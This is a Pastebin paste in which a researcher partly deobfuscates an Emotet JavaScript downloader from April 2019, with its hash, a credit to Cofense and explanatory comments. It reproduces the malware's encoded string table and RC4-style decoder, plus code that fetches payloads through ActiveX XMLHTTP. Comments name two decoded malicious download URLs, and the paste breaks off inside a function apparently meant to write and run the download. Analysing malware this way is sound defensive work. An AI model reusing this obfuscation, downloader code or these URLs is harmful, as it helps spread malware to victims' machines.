API tools faq
paste
Advertisement
jcarndt

Untangling javascript

jcarndt
May 1st, 2019
149
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 38.16 KB | None | 0 0
raw download clone embed print report
  1. //From an Emotet .js file recieved on 4.26.2019
  2. //SHA256 A95B13778F1D7907C0F5E836597F056BABE04CF50A24143CBD0227F595C6A9BE
  3. //The emotet crew added a new layer of obfuscation and I was curious to see how it worked. This is heavily based upon the work done by Cofense: https://cofense.com/emotet-update-new-c2-communication-followed-new-infection-chain/
  4. //I just attempted to untangle the main decoder function.
  5. //Apologies in advance for any of my silly variable names.
  6.  
  7. var hexArray = [
  8.     '\x77\x36\x63\x35\x59\x73\x4f\x36\x44\x51\x3d\x3d',
  9.     '\x49\x77\x51\x4b\x65\x48\x2f\x43\x68\x31\x64\x65\x64\x41\x56\x4d\x63\x33\x37\x43\x70\x51\x3d\x3d',
  10.     '\x77\x37\x5a\x53\x77\x37\x6e\x44\x71\x63\x4f\x64',
  11.     '\x4e\x68\x58\x44\x71\x77\x3d\x3d',
  12.     '\x54\x43\x37\x44\x6d\x43\x76\x44\x73\x51\x3d\x3d',
  13.     '\x66\x38\x4b\x68\x77\x72\x6c\x33\x5a\x41\x3d\x3d',
  14.     '\x77\x35\x56\x76\x77\x72\x42\x33\x64\x67\x3d\x3d',
  15.     '\x58\x54\x63\x70\x77\x36\x63\x3d',
  16.     '\x62\x54\x44\x44\x71\x51\x33\x44\x6c\x51\x3d\x3d',
  17.     '\x77\x35\x55\x51\x58\x63\x4f\x35',
  18.     '\x41\x51\x59\x30\x56\x6d\x49\x3d',
  19.     '\x77\x72\x5a\x59\x46\x6d\x5a\x58\x41\x41\x3d\x3d',
  20.     '\x5a\x38\x4f\x4f\x44\x77\x54\x44\x6d\x67\x3d\x3d',
  21.     '\x46\x6d\x7a\x44\x69\x4d\x4b\x4c\x43\x63\x4b\x6e\x77\x34\x66\x44\x76\x63\x4b\x2b\x4a\x6b\x52\x45',
  22.     '\x77\x36\x7a\x43\x75\x6e\x50\x43\x71\x38\x4f\x70',
  23.     '\x45\x77\x66\x43\x71\x42\x74\x48',
  24.     '\x46\x4d\x4f\x4d\x77\x6f\x74\x48\x77\x36\x2f\x43\x75\x52\x6b\x69\x77\x71\x7a\x43\x6c\x73\x4b\x51\x77\x72\x58\x44\x73\x32\x62\x44\x6a\x38\x4b\x31',
  25.     '\x4e\x38\x4b\x31\x57\x47\x7a\x44\x6e\x41\x3d\x3d',
  26.     '\x66\x47\x30\x56\x77\x36\x55\x6e',
  27.     '\x53\x56\x59\x6e\x77\x34\x6b\x64',
  28.     '\x77\x72\x68\x4c\x63\x73\x4f\x61\x77\x36\x73\x3d',
  29.     '\x65\x4d\x4f\x55\x56\x38\x4f\x6f\x4e\x51\x3d\x3d',
  30.     '\x65\x63\x4f\x39\x77\x34\x4c\x43\x74\x73\x4b\x62',
  31.     '\x61\x63\x4b\x4b\x47\x32\x50\x43\x68\x4d\x4f\x30\x77\x72\x55\x62\x55\x77\x3d\x3d',
  32.     '\x53\x38\x4b\x6d\x77\x71\x34\x51\x49\x67\x3d\x3d',
  33.     '\x77\x72\x4c\x43\x6e\x63\x4b\x6c\x77\x36\x2f\x44\x6a\x38\x4f\x73\x77\x6f\x6b\x77\x77\x35\x6e\x44\x6d\x45\x56\x57\x49\x77\x3d\x3d',
  34.     '\x77\x6f\x4e\x4e\x52\x51\x34\x4c',
  35.     '\x77\x72\x42\x4e\x49\x38\x4f\x38\x62\x77\x3d\x3d',
  36.     '\x4c\x48\x33\x44\x6a\x38\x4b\x4c\x58\x4d\x4f\x6d\x77\x70\x76\x43\x72\x73\x4f\x4d\x63\x55\x52\x59\x61\x38\x4f\x64\x77\x6f\x77\x7a\x4f\x31\x4a\x76\x77\x72\x56\x49\x77\x34\x54\x44\x67\x38\x4f\x44\x65\x79\x62\x43\x72\x4d\x4f\x73\x77\x71\x62\x43\x6b\x63\x4f\x52\x66\x73\x4b\x38', //"http://608design.com/mainto/6Cgy/"
  37.     '\x77\x36\x31\x6b\x77\x34\x44\x44\x75\x4d\x4f\x48',
  38.     '\x77\x36\x50\x43\x73\x57\x33\x43\x71\x73\x4f\x70',
  39.     '\x4d\x30\x76\x44\x71\x63\x4f\x59\x4c\x56\x50\x44\x6d\x33\x72\x44\x67\x42\x49\x6b\x77\x37\x49\x72\x57\x46\x44\x44\x6c\x73\x4f\x73\x4e\x6e\x7a\x44\x67\x6a\x5a\x4c\x77\x36\x4d\x7a\x4d\x6c\x39\x5a\x46\x6d\x31\x45\x77\x34\x63\x78\x4c\x51\x3d\x3d', //"https://cssshk.com/wp-admin/gz56/"
  40.     '\x4c\x57\x72\x44\x76\x63\x4b\x59\x77\x34\x63\x3d',
  41.     '\x59\x42\x39\x50\x77\x35\x68\x42',
  42.     '\x4c\x73\x4b\x36\x77\x35\x4d\x64\x77\x36\x59\x3d',
  43.     '\x77\x72\x78\x48\x77\x35\x7a\x44\x6c\x56\x63\x3d',
  44.     '\x46\x77\x50\x44\x69\x44\x31\x71',
  45.     '\x4e\x79\x72\x44\x74\x43\x46\x4a',
  46.     '\x46\x44\x4c\x44\x6e\x6a\x68\x46',
  47.     '\x77\x35\x52\x32\x56\x45\x31\x76',
  48.     '\x4c\x73\x4b\x53\x77\x72\x6b\x50\x77\x72\x76\x44\x75\x6c\x35\x7a\x77\x72\x62\x44\x6f\x38\x4f\x38\x77\x36\x58\x44\x75\x33\x50\x43\x71\x63\x4f\x48\x77\x71\x6a\x43\x73\x63\x4f\x4c\x77\x6f\x55\x51\x77\x37\x6f\x62\x77\x35\x35\x36\x77\x35\x54\x44\x6a\x57\x48\x43\x75\x38\x4b\x6d\x77\x37\x59\x65\x77\x70\x55\x37\x77\x34\x62\x44\x71\x63\x4b\x53\x77\x34\x41\x54\x77\x72\x55\x48\x4b\x73\x4b\x54\x61\x52\x4c\x44\x74\x38\x4b\x75\x77\x36\x77\x46\x42\x73\x4b\x4b\x77\x6f\x72\x43\x72\x48\x51\x64\x77\x71\x68\x35\x77\x35\x66\x44\x70\x38\x4f\x45\x4f\x58\x41\x3d',
  49.     '\x65\x73\x4b\x69\x53\x4d\x4b\x2b',
  50.     '\x4c\x4d\x4b\x54\x58\x47\x73\x3d',
  51.     '\x63\x48\x41\x46\x77\x37\x55\x54',
  52.     '\x63\x73\x4b\x73\x77\x70\x35\x4e',
  53.     '\x77\x35\x77\x70\x77\x35\x5a\x70\x77\x36\x34\x3d',
  54.     '\x47\x38\x4f\x58\x77\x70\x56\x52\x77\x36\x38\x3d',
  55.     '\x56\x42\x51\x37\x77\x35\x70\x2b',
  56.     '\x4b\x38\x4f\x79\x53\x45\x44\x44\x69\x41\x3d\x3d',
  57.     '\x77\x37\x6b\x77\x77\x34\x52\x77\x77\x35\x49\x3d',
  58.     '\x4b\x38\x4f\x72\x77\x72\x39\x2b\x77\x37\x30\x3d',
  59.     '\x77\x72\x5a\x63\x47\x33\x74\x57',
  60.     '\x53\x73\x4b\x6a\x77\x72\x52\x59\x57\x41\x3d\x3d',
  61.     '\x77\x6f\x4c\x44\x6c\x38\x4b\x2f\x63\x4d\x4b\x61',
  62.     '\x77\x37\x63\x4a\x77\x35\x31\x62\x77\x34\x41\x3d',
  63.     '\x77\x36\x38\x70\x77\x37\x4e\x55\x77\x36\x55\x3d',
  64.     '\x59\x77\x6c\x4b\x77\x6f\x37\x43\x74\x51\x3d\x3d',
  65.     '\x4e\x38\x4b\x2f\x52\x6c\x6a\x44\x6e\x51\x3d\x3d',
  66.     '\x77\x6f\x66\x44\x6d\x38\x4b\x4d\x54\x63\x4b\x6d\x77\x6f\x73\x2f\x77\x71\x38\x6d\x45\x38\x4f\x74\x4a\x38\x4f\x55\x77\x70\x58\x43\x71\x56\x76\x44\x6c\x57\x72\x44\x75\x67\x3d\x3d',
  67.     '\x77\x72\x35\x52\x57\x58\x46\x4e\x48\x53\x33\x44\x72\x44\x73\x54\x77\x71\x31\x56\x57\x6a\x4a\x64\x77\x6f\x6a\x44\x6e\x77\x78\x46\x61\x43\x66\x43\x72\x38\x4f\x4c\x77\x37\x68\x6f\x77\x34\x62\x44\x72\x4d\x4f\x4a\x45\x4d\x4b\x2f\x55\x78\x38\x3d',
  68.     '\x62\x79\x39\x4e\x77\x72\x72\x43\x73\x52\x7a\x43\x76\x41\x3d\x3d',
  69.     '\x45\x63\x4f\x57\x77\x6f\x74\x58\x77\x37\x54\x43\x76\x42\x4d\x3d',
  70.     '\x77\x37\x51\x76\x77\x35\x4d\x3d',
  71.     '\x47\x54\x59\x67\x57\x77\x3d\x3d',
  72.     '\x77\x70\x54\x43\x73\x42\x6e\x43\x74\x4d\x4f\x76',
  73.     '\x77\x35\x34\x54\x77\x35\x37\x44\x69\x41\x3d\x3d',
  74.     '\x77\x35\x49\x50\x77\x34\x72\x44\x69\x4d\x4f\x47',
  75.     '\x46\x38\x4f\x42\x77\x6f\x5a\x42\x77\x36\x76\x43\x70\x42\x38\x6a\x77\x36\x49\x3d',
  76.     '\x57\x4d\x4f\x59\x77\x71\x78\x33\x42\x51\x3d\x3d',
  77.     '\x5a\x38\x4f\x59\x77\x71\x35\x68\x49\x67\x3d\x3d',
  78.     '\x66\x7a\x42\x50\x77\x71\x44\x43\x71\x67\x3d\x3d',
  79.     '\x4a\x32\x62\x44\x6c\x63\x4b\x49\x43\x63\x4b\x6c\x77\x35\x45\x3d',
  80.     '\x77\x71\x4e\x57\x49\x38\x4f\x4c\x57\x77\x3d\x3d',
  81.     '\x44\x73\x4f\x6e\x62\x58\x7a\x44\x6a\x38\x4b\x71\x47\x77\x3d\x3d',
  82.     '\x52\x63\x4f\x58\x77\x37\x76\x43\x69\x63\x4b\x4e\x77\x34\x54\x44\x6c\x4d\x4f\x72\x56\x51\x3d\x3d',
  83.     '\x77\x72\x59\x49\x77\x36\x4c\x43\x67\x58\x6b\x3d',
  84.     '\x77\x71\x5a\x44\x47\x57\x46\x4e\x48\x7a\x73\x3d',
  85.     '\x65\x73\x4b\x69\x52\x38\x4b\x6c',
  86.     '\x77\x35\x45\x55\x51\x63\x4f\x7a',
  87.     '\x4f\x4d\x4b\x4f\x77\x35\x66\x44\x76\x51\x35\x73\x77\x36\x77\x3d',
  88.     '\x77\x6f\x42\x54\x53\x73\x4f\x59\x77\x36\x67\x3d',
  89.     '\x59\x56\x68\x41\x77\x71\x76\x44\x6e\x4d\x4b\x7a\x77\x37\x51\x3d',
  90.     '\x77\x35\x52\x79\x77\x34\x6b\x3d',
  91.     '\x53\x38\x4f\x66\x4e\x52\x37\x44\x72\x77\x3d\x3d',
  92.     '\x42\x4d\x4f\x61\x77\x71\x39\x72\x77\x34\x45\x3d',
  93.     '\x4e\x68\x5a\x62\x4b\x47\x63\x3d',
  94.     '\x77\x70\x64\x6f\x66\x4d\x4f\x55\x77\x36\x59\x3d',
  95.     '\x66\x73\x4f\x62\x77\x6f\x70\x67\x4c\x41\x3d\x3d',
  96.     '\x57\x73\x4f\x52\x49\x53\x44\x44\x6f\x51\x3d\x3d',
  97.     '\x77\x6f\x64\x78\x59\x4d\x4f\x4f\x77\x36\x38\x3d',
  98.     '\x77\x70\x68\x70\x65\x67\x73\x61\x77\x36\x66\x43\x6b\x38\x4b\x35\x77\x72\x54\x44\x70\x38\x4f\x77\x77\x34\x67\x75\x53\x54\x6f\x51\x77\x71\x72\x44\x73\x4d\x4b\x6b\x43\x73\x4f\x76\x58\x73\x4f\x5a\x77\x36\x7a\x44\x67\x31\x77\x48\x4c\x73\x4b\x64\x77\x35\x45\x45\x77\x34\x56\x45\x52\x4d\x4f\x73\x66\x67\x64\x79\x77\x37\x7a\x43\x71\x56\x5a\x54\x77\x72\x48\x44\x72\x53\x4c\x44\x74\x6d\x7a\x43\x6b\x58\x46\x76\x49\x63\x4f\x79\x77\x6f\x2f\x44\x73\x43\x37\x44\x71\x31\x6e\x43\x6f\x73\x4f\x57\x77\x35\x42\x37\x47\x58\x6f\x45\x77\x72\x42\x6d\x4e\x73\x4f\x4f\x77\x72\x77\x4e\x45\x38\x4b\x52\x63\x73\x4f\x77\x4a\x77\x3d\x3d',
  99.     '\x54\x38\x4f\x48\x63\x63\x4f\x4b\x48\x51\x3d\x3d',
  100.     '\x77\x35\x48\x43\x70\x56\x33\x43\x6a\x38\x4f\x53',
  101.     '\x4f\x46\x7a\x44\x75\x63\x4f\x4a\x4d\x51\x3d\x3d',
  102.     '\x46\x63\x4b\x63\x77\x35\x63\x72\x77\x36\x59\x3d',
  103.     '\x77\x70\x74\x6e\x77\x36\x6e\x44\x6a\x33\x6b\x3d',
  104.     '\x54\x38\x4f\x6a\x77\x70\x70\x37\x43\x77\x3d\x3d',
  105.     '\x53\x4d\x4f\x62\x77\x36\x7a\x43\x6e\x4d\x4f\x48\x77\x70\x2f\x43\x6b\x73\x4f\x6c\x53\x46\x68\x62\x77\x71\x78\x51\x62\x4d\x4f\x65\x57\x38\x4b\x74\x47\x38\x4b\x35\x59\x73\x4f\x54\x61\x73\x4b\x76\x77\x34\x4c\x43\x6b\x42\x78\x68\x59\x41\x3d\x3d',
  106.     '\x58\x63\x4f\x66\x77\x6f\x46\x44\x4c\x67\x3d\x3d',
  107.     '\x77\x34\x70\x71\x52\x51\x76\x44\x67\x67\x3d\x3d',
  108.     '\x77\x37\x49\x6d\x52\x73\x4f\x53\x4f\x51\x3d\x3d',
  109.     '\x64\x33\x45\x41\x77\x37\x78\x7a\x77\x36\x4c\x44\x76\x4d\x4f\x56\x4b\x63\x4f\x68\x4f\x38\x4f\x64\x4c\x38\x4f\x72\x77\x34\x4c\x43\x6b\x6c\x66\x44\x70\x45\x31\x6a\x4c\x73\x4b\x50\x50\x63\x4f\x4d\x58\x63\x4f\x46\x77\x34\x70\x68',
  110.     '\x77\x34\x4e\x62\x66\x56\x46\x67',
  111.     '\x62\x6e\x41\x34\x77\x35\x73\x48',
  112.     '\x77\x71\x31\x58\x77\x35\x44\x44\x74\x48\x30\x3d',
  113.     '\x4c\x31\x44\x44\x74\x73\x4b\x33\x45\x77\x3d\x3d',
  114.     '\x77\x37\x70\x71\x55\x77\x50\x44\x6e\x63\x4b\x64\x77\x70\x76\x43\x69\x48\x62\x44\x6d\x6b\x6f\x71\x65\x73\x4f\x7a\x77\x72\x31\x4d\x77\x72\x50\x44\x6e\x31\x4c\x43\x6d\x63\x4b\x52\x77\x72\x2f\x43\x73\x73\x4f\x38\x77\x6f\x52\x41',
  115.     '\x44\x38\x4b\x79\x77\x37\x76\x44\x70\x79\x4d\x3d',
  116.     '\x61\x56\x77\x7a\x77\x35\x73\x37',
  117.     '\x77\x37\x39\x36\x77\x71\x78\x63\x62\x51\x3d\x3d',
  118.     '\x4a\x51\x50\x44\x76\x51\x64\x6a',
  119.     '\x48\x47\x54\x43\x76\x69\x6c\x68',
  120.     '\x77\x70\x45\x57\x43\x56\x33\x44\x6f\x63\x4b\x4c',
  121.     '\x4c\x4d\x4b\x5a\x66\x47\x76\x44\x68\x4d\x4f\x68\x77\x36\x73\x41',
  122.     '\x77\x35\x55\x41\x55\x63\x4f\x75\x46\x38\x4f\x4b',
  123.     '\x51\x44\x49\x71\x55\x41\x3d\x3d',
  124.     '\x77\x72\x64\x34\x65\x69\x67\x5a\x77\x72\x6a\x44\x6e\x38\x4f\x2f\x77\x72\x66\x44\x72\x73\x4f\x44\x77\x35\x4d\x72\x53\x79\x5a\x4d',
  125.     '\x4c\x4d\x4b\x31\x77\x35\x62\x44\x68\x51\x6b\x3d',
  126.     '\x77\x35\x58\x43\x72\x73\x4f\x51\x77\x34\x76\x43\x75\x77\x3d\x3d',
  127.     '\x42\x55\x33\x44\x74\x4d\x4b\x2f\x4a\x4d\x4f\x6e\x77\x36\x66\x44\x72\x4d\x4b\x4f\x4c\x45\x46\x51',
  128.     '\x64\x79\x39\x39\x77\x35\x64\x6e',
  129.     '\x77\x36\x7a\x43\x6e\x42\x54\x44\x75\x73\x4b\x34',
  130.     '\x4d\x31\x33\x44\x6c\x4d\x4b\x77\x44\x67\x3d\x3d',
  131.     '\x77\x34\x50\x43\x71\x55\x72\x43\x76\x63\x4b\x39\x77\x34\x5a\x59\x77\x35\x56\x46\x77\x35\x48\x43\x75\x4d\x4f\x58\x77\x72\x78\x69\x77\x37\x49\x3d',
  132.     '\x59\x4d\x4b\x38\x54\x63\x4b\x6a\x46\x67\x3d\x3d',
  133.     '\x77\x37\x45\x48\x57\x73\x4f\x70\x42\x67\x3d\x3d',
  134.     '\x66\x54\x63\x70\x77\x36\x63\x3d',
  135.     '\x77\x70\x45\x42\x77\x36\x2f\x43\x68\x33\x73\x3d',
  136.     '\x50\x4d\x4f\x48\x51\x6c\x66\x44\x70\x67\x3d\x3d',
  137.     '\x77\x37\x55\x55\x52\x63\x4f\x34\x4e\x38\x4f\x58\x77\x71\x59\x2b\x77\x36\x68\x4b',
  138.     '\x77\x36\x5a\x58\x51\x57\x4d\x3d',
  139.     '\x51\x38\x4b\x6a\x55\x73\x4b\x6a\x46\x73\x4b\x74\x77\x37\x34\x64',
  140.     '\x77\x6f\x56\x4a\x66\x4d\x4f\x2f\x77\x36\x6f\x3d',
  141.     '\x52\x38\x4f\x61\x66\x63\x4f\x56\x48\x51\x3d\x3d',
  142.     '\x54\x38\x4b\x63\x50\x78\x77\x6a',
  143.     '\x53\x73\x4f\x6c\x56\x63\x4f\x4d\x4f\x47\x4c\x44\x67\x63\x4f\x2f\x50\x44\x72\x43\x6f\x38\x4f\x6a\x77\x71\x34\x3d',
  144.     '\x54\x33\x51\x64\x77\x34\x73\x38',
  145.     '\x53\x43\x68\x65\x77\x72\x4e\x54\x77\x72\x74\x39\x48\x63\x4f\x68\x77\x72\x6a\x44\x73\x4d\x4f\x6a\x4e\x4d\x4f\x6b\x77\x35\x6e\x44\x75\x6c\x48\x44\x69\x63\x4b\x55\x77\x35\x66\x44\x71\x38\x4b\x54\x46\x4d\x4b\x6a\x77\x35\x6f\x3d',
  146.     '\x77\x72\x62\x44\x6a\x4d\x4b\x64\x57\x63\x4b\x67\x77\x6f\x42\x51\x77\x36\x55\x71\x41\x38\x4f\x67\x4d\x41\x3d\x3d',
  147.     '\x77\x35\x50\x43\x73\x73\x4f\x79\x77\x36\x48\x43\x6c\x4d\x4f\x67\x77\x34\x35\x69\x77\x72\x72\x44\x6a\x42\x46\x47\x65\x67\x3d\x3d',
  148.     '\x77\x36\x5a\x47\x56\x48\x52\x4c\x58\x73\x4b\x71\x77\x72\x49\x72\x55\x73\x4f\x72\x47\x77\x67\x71\x77\x70\x45\x68\x77\x35\x72\x44\x6d\x38\x4f\x77\x56\x4d\x4f\x50\x77\x34\x4d\x31\x55\x78\x6a\x43\x6b\x48\x62\x43\x76\x73\x4b\x5a\x57\x38\x4b\x51\x77\x37\x74\x50\x77\x6f\x6c\x55\x62\x38\x4f\x6c\x59\x73\x4f\x56\x66\x4d\x4b\x52\x42\x4d\x4b\x58\x77\x6f\x72\x44\x75\x6e\x41\x46\x57\x4d\x4f\x31\x77\x71\x64\x2f\x77\x37\x37\x43\x70\x63\x4b\x30\x77\x37\x77\x6f\x77\x71\x56\x75\x54\x32\x41\x72\x77\x34\x73\x67\x77\x6f\x5a\x57\x77\x71\x54\x43\x69\x46\x4d\x4d\x77\x36\x33\x44\x70\x63\x4f\x49\x77\x70\x2f\x43\x69\x73\x4f\x4e\x4a\x41\x48\x44\x73\x73\x4b\x6c\x77\x6f\x72\x43\x76\x6b\x66\x43\x70\x38\x4b\x33\x77\x71\x2f\x43\x6b\x67\x72\x44\x70\x63\x4b\x6c\x57\x48\x4e\x47\x49\x4d\x4f\x4c\x46\x45\x62\x44\x67\x58\x73\x6a\x4d\x4d\x4b\x64\x77\x34\x54\x43\x6c\x79\x44\x43\x6b\x73\x4f\x48\x77\x70\x52\x5a\x77\x6f\x77\x42\x77\x34\x44\x43\x70\x52\x42\x6a\x77\x6f\x73\x63\x77\x72\x77\x44\x77\x36\x72\x44\x71\x73\x4b\x32\x45\x67\x7a\x44\x76\x6a\x33\x43\x75\x42\x68\x61\x77\x6f\x54\x44\x6b\x55\x31\x41\x51\x52\x72\x43\x72\x7a\x72\x44\x6b\x63\x4f\x6d\x61\x69\x37\x43\x6d\x42\x4c\x43\x6b\x38\x4f\x2b\x77\x36\x4e\x69\x77\x35\x4d\x4c\x77\x70\x76\x43\x67\x73\x4b\x75\x64\x4d\x4b\x77\x64\x38\x4f\x67\x77\x35\x37\x44\x6f\x73\x4b\x78\x58\x45\x6e\x43\x6a\x4d\x4f\x44\x77\x71\x54\x44\x73\x4d\x4f\x48\x77\x35\x54\x44\x6a\x51\x3d\x3d',
  149.     '\x77\x72\x4d\x47\x44\x6e\x37\x44\x75\x77\x3d\x3d',
  150.     '\x5a\x73\x4b\x46\x77\x35\x34\x65\x53\x77\x3d\x3d',
  151.     '\x46\x68\x7a\x43\x74\x6a\x42\x73',
  152.     '\x49\x79\x58\x44\x6b\x51\x3d\x3d',
  153.     '\x54\x63\x4f\x34\x77\x37\x76\x43\x70\x38\x4b\x78',
  154.     '\x42\x77\x35\x2b\x41\x6e\x5a\x2b\x4d\x63\x4b\x45\x77\x35\x66\x44\x72\x38\x4f\x62\x61\x4d\x4b\x62\x77\x71\x56\x7a',
  155.     '\x77\x36\x48\x43\x67\x6b\x4c\x43\x69\x73\x4f\x2f',
  156.     '\x77\x35\x58\x43\x6e\x79\x72\x44\x76\x38\x4b\x41\x56\x57\x30\x3d',
  157.     '\x77\x6f\x58\x44\x69\x38\x4b\x2b\x61\x63\x4b\x69',
  158.     '\x49\x7a\x41\x57\x51\x48\x49\x3d',
  159.     '\x59\x63\x4b\x75\x77\x6f\x68\x4c',
  160.     '\x4a\x38\x4f\x4e\x54\x58\x6e\x44\x74\x77\x3d\x3d',
  161.     '\x77\x37\x4c\x43\x74\x7a\x50\x44\x6f\x73\x4b\x52',
  162.     '\x77\x34\x31\x73\x51\x78\x38\x3d',
  163.     '\x49\x38\x4f\x44\x61\x33\x58\x44\x71\x67\x3d\x3d',
  164.     '\x77\x72\x5a\x59\x46\x6d\x5a\x48\x50\x44\x7a\x44\x73\x69\x77\x46\x77\x72\x6f\x3d',
  165.     '\x51\x73\x4b\x77\x77\x70\x39\x59\x65\x77\x3d\x3d',
  166.     '\x77\x36\x64\x58\x77\x70\x4e\x35\x64\x73\x4b\x34',
  167.     '\x54\x38\x4f\x46\x77\x71\x4e\x6e\x46\x43\x66\x43\x6e\x57\x52\x68\x77\x36\x31\x6b',
  168.     '\x77\x37\x6c\x30\x77\x6f\x4a\x62\x56\x41\x3d\x3d',
  169.     '\x5a\x38\x4b\x35\x77\x70\x31\x56\x52\x77\x3d\x3d',
  170.     '\x42\x44\x5a\x79\x41\x56\x38\x3d',
  171.     '\x55\x4d\x4f\x61\x77\x35\x37\x43\x76\x63\x4b\x4c',
  172.     '\x77\x70\x59\x34\x55\x58\x6a\x43\x71\x38\x4f\x4d',
  173.     '\x5a\x63\x4b\x6d\x77\x6f\x4e\x4b\x53\x73\x4f\x56\x77\x71\x37\x43\x68\x58\x54\x43\x6d\x73\x4b\x53',
  174.     '\x44\x6c\x6a\x43\x6d\x77\x73\x3d',
  175.     '\x77\x37\x39\x4a\x64\x58\x4e\x76',
  176.     '\x77\x70\x62\x44\x6e\x38\x4b\x55\x56\x41\x3d\x3d',
  177.     '\x51\x63\x4f\x4d\x77\x36\x7a\x43\x68\x63\x4b\x53\x77\x35\x34\x3d',
  178.     '\x4c\x33\x58\x44\x6f\x38\x4b\x48\x77\x34\x72\x44\x6a\x56\x72\x43\x6e\x63\x4f\x78\x77\x70\x68\x42',
  179.     '\x56\x4d\x4f\x6a\x46\x54\x7a\x44\x6c\x77\x3d\x3d',
  180.     '\x53\x41\x64\x50\x77\x72\x72\x43\x75\x77\x3d\x3d',
  181.     '\x77\x35\x56\x4a\x56\x48\x51\x3d',
  182.     '\x77\x37\x56\x54\x77\x70\x46\x38\x59\x51\x3d\x3d',
  183.     '\x53\x41\x78\x43\x77\x36\x6c\x4b',
  184.     '\x64\x6a\x34\x2b\x77\x36\x68\x77'
  185. ];
  186. var decoder = function (arrayIndex, extraHex) {
  187.     arrayIndex = arrayIndex - 0x0;
  188.     var indexValue = hexArray[arrayIndex];
  189.     if (decoder['azsjga'] === undefined) {
  190.         (function () {
  191.             var _0x30ce4e;
  192.             try {
  193.                 var _0xfb6156 = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
  194.                 _0x30ce4e = _0xfb6156();
  195.             } catch (_0x181483) {
  196.                 _0x30ce4e = window;
  197.             }
  198.             var base64Chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
  199.             _0x30ce4e['atob'] || (_0x30ce4e['atob'] = function (_0x59e0a0) {
  200.                 var _0x124a74 = String(_0x59e0a0)['replace'](/=+$/, '');
  201.                 for (var _0x1f24bd = 0x0, _0x1d00db, _0x2f8c13, _0x5c4866 = 0x0, _0x3a06ec = ''; _0x2f8c13 = _0x124a74['charAt'](_0x5c4866++); ~_0x2f8c13 && (_0x1d00db = _0x1f24bd % 0x4 ? _0x1d00db * 0x40 + _0x2f8c13 : _0x2f8c13, _0x1f24bd++ % 0x4) ? _0x3a06ec += String['fromCharCode'](0xff & _0x1d00db >> (-0x2 * _0x1f24bd & 0x6)) : 0x0) {
  202.                     _0x2f8c13 = base64Chars['indexOf'](_0x2f8c13);
  203.                 }
  204.                 return _0x3a06ec;
  205.             });
  206.         }());
  207.         var decodeString = function (encodedString, extraHex) {
  208.             var array1 = [], var1 = 0x0, var2, var3 = '', uriString = '';
  209.             encodedString = atob(encodedString); //decode base-64 encoded string
  210.            
  211.             //Convert each character in string to a string value, convert it to binary, take only the last two characters. Prefix each character with %
  212.             for (var count = 0x0, base64StringLength = encodedString['length']; count < base64StringLength; count++) {
  213.                 uriString += '%' + ('00' + encodedString['charCodeAt'](count)['toString'](0x10))['slice'](-0x2);
  214.             }
  215.             encodedString = decodeURIComponent(uriString);
  216.            
  217.             //Create array with elements from 0..256
  218.             for (var counter2 = 0x0; counter2 < 0x100; counter2++) {
  219.                 array1[counter2] = counter2;
  220.             }
  221.              
  222.             for (counter2 = 0x0; counter2 < 0x100; counter2++) {
  223.                 //Take extraHex character by character, find modulus against extraHex length, add it to the value of array location plus value of var1. Take the modulus against 256 and put it in var1. Do this 256 times.
  224.                 var1 = (var1 + array1[counter2] + extraHex['charCodeAt'](counter2 % extraHex['length'])) % 0x100;
  225.                 var2 = array1[counter2];
  226.                 array1[counter2] = array1[var1]; //replace array count with new value from var1
  227.                 array1[var1] = var2; //put value of var2 in the place of var1
  228.             }
  229.             counter2 = 0x0; //clear out counter
  230.             var1 = 0x0; //clear out variable
  231.            
  232.             for (var counter3 = 0x0; counter3 < encodedString['length']; counter3++) {
  233.                 counter2 = (counter2 + 0x1) % 0x100;
  234.                 var1 = (var1 + array1[counter2]) % 0x100;
  235.                 var2 = array1[counter2];
  236.                 array1[counter2] = array1[var1];
  237.                 array1[var1] = var2;
  238.                 var3 += String['fromCharCode'](encodedString['charCodeAt'](counter3) ^ array1[(array1[counter2] + array1[var1]) % 0x100]);
  239.             }
  240.             return var3;
  241.         };
  242.         decoder['rjrlla'] = decodeString;
  243.         decoder['buKkqm'] = {};
  244.         decoder['azsjga'] = !![];
  245.     }
  246.     var _0x442eaf = decoder['buKkqm'][arrayIndex];
  247.     if (_0x442eaf === undefined) {
  248.         if (decoder['sDKOfx'] === undefined) {
  249.             decoder['sDKOfx'] = !![];
  250.         }
  251.         indexValue = decoder['rjrlla'](indexValue, extraHex);
  252.         decoder['buKkqm'][arrayIndex] = indexValue;
  253.     } else {
  254.         indexValue = _0x442eaf;
  255.     }
  256.     return indexValue;
  257. };
  258. function getDataFromUrl(url, responseHandler) {
  259.     var _0xc3557f = {};
  260.     _0xc3557f[decoder('0x0', '\x62\x4d\x52\x73')] = decoder('0x1', '\x71\x5d\x29\x4c');
  261.     _0xc3557f[decoder('0x2', '\x31\x5d\x41\x71')] = decoder('0x3', '\x4c\x64\x6a\x4e');
  262.     _0xc3557f[decoder('0x4', '\x78\x6e\x76\x4b')] = function (_0x2a5334, _0x363968) {
  263.         return _0x2a5334 == _0x363968;
  264.     };
  265.     _0xc3557f[decoder('0x5', '\x34\x2a\x50\x41')] = function (_0x257d9f, _0x363b24, _0x5e2eaa) {
  266.         return _0x257d9f(_0x363b24, _0x5e2eaa);
  267.     };
  268.     try {
  269.         var xmlHttpObject = new ActiveXObject(_0xc3557f[decoder('0x6', '\x2a\x6d\x78\x6e')]);
  270.         xmlHttpObject[decoder('0x7', '\x4a\x5b\x55\x23')](_0xc3557f[decoder('0x8', '\x78\x6e\x76\x4b')], url, ![]);
  271.         xmlHttpObject[decoder('0x9', '\x62\x4d\x52\x73')]();
  272.         if (_0xc3557f[decoder('0xa', '\x71\x5d\x29\x4c')](xmlHttpObject[decoder('0xb', '\x68\x26\x40\x48')], 0xc8)) {
  273.             return _0xc3557f[decoder('0xc', '\x4e\x74\x4d\x5b')](responseHandler, xmlHttpObject[decoder('0xd', '\x26\x47\x21\x63')], ![]);
  274.         } else {
  275.             return _0xc3557f[decoder('0xe', '\x35\x54\x37\x4e')](responseHandler, null, !![]);
  276.         }
  277.     } catch (e) {
  278.         return responseHandler(null, !![]);
  279.     }
  280. }
  281. function getData(writeAndExecute) {
  282.     var _0x2a45ee = {};
  283.     _0x2a45ee[decoder('0xf', '\x4f\x24\x43\x29')] = decoder('0x10', '\x53\x6a\x70\x6f');
